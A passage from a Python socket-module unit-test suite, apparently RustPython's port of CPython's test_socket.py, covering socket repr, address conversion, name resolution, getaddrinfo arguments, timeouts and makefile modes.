missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
# TODO: RUSTPYTHON
@unittest.expectedFailure
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
if socket.has_ipv6:
socket.AF_INET6
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testCrucialIpProtoConstants(self):
socket.IPPROTO_TCP
socket.IPPROTO_UDP
if socket.has_ipv6:
socket.IPPROTO_IPV6
@unittest.skipUnless(os.name == "nt", "Windows specific")
def testWindowsSpecificConstants(self):
socket.IPPROTO_ICLFXBM
socket.IPPROTO_ST
socket.IPPROTO_CBT
socket.IPPROTO_IGP
socket.IPPROTO_RDP
socket.IPPROTO_PGM
socket.IPPROTO_L2TP
socket.IPPROTO_SCTP
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [support.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS, may successfully resolve these
# IPs.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError, msg=addr):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_indextoname'),
'socket.if_indextoname() not available.')
def testInvalidInterfaceIndexToName(self):
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(socket, 'if_nametoindex'),
'socket.if_nametoindex() not available.')
def testInvalidInterfaceNameToIndex(self):
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
_testcapi.INT_MAX + 1]
s_deprecated_values = [1<<16, _testcapi.INT_MAX]
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
for k in s_deprecated_values:
self.assertWarns(DeprecationWarning, socket.ntohs, k)
self.assertWarns(DeprecationWarning, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
# assumption breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as s:
self.assertEqual(s.gettimeout(), None)
# Set the default timeout to 10, and see if it propagates
with socket_setdefaulttimeout(10):
self.assertEqual(socket.getdefaulttimeout(), 10)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), 10)
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), None)
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# We know a socket should start without reuse==0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.settimeout(1)
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
sock.bind((socket._LOCALHOST, 0))
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
# TODO: RUSTPYTHON, windows ioctls
@unittest.expectedFailure
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
"doesn't implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
# XXX RUSTPYTHON TODO: surrogates in str
# self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
# TODO: RUSTPYTHON, socket.gethostbyname_ex
@unittest.expectedFailure
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
sock = socket.socket()
try:
sock.bind((HOST, 0))
socket.close(sock.fileno())
with self.assertRaises(OSError):
sock.listen(1)
finally:
with self.assertRaises(OSError):
# sock.close() fails with EBADF
sock.close()
with self.assertRaises(TypeError):
socket.close(None)
with self.assertRaises(OSError):
socket.close(-1)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
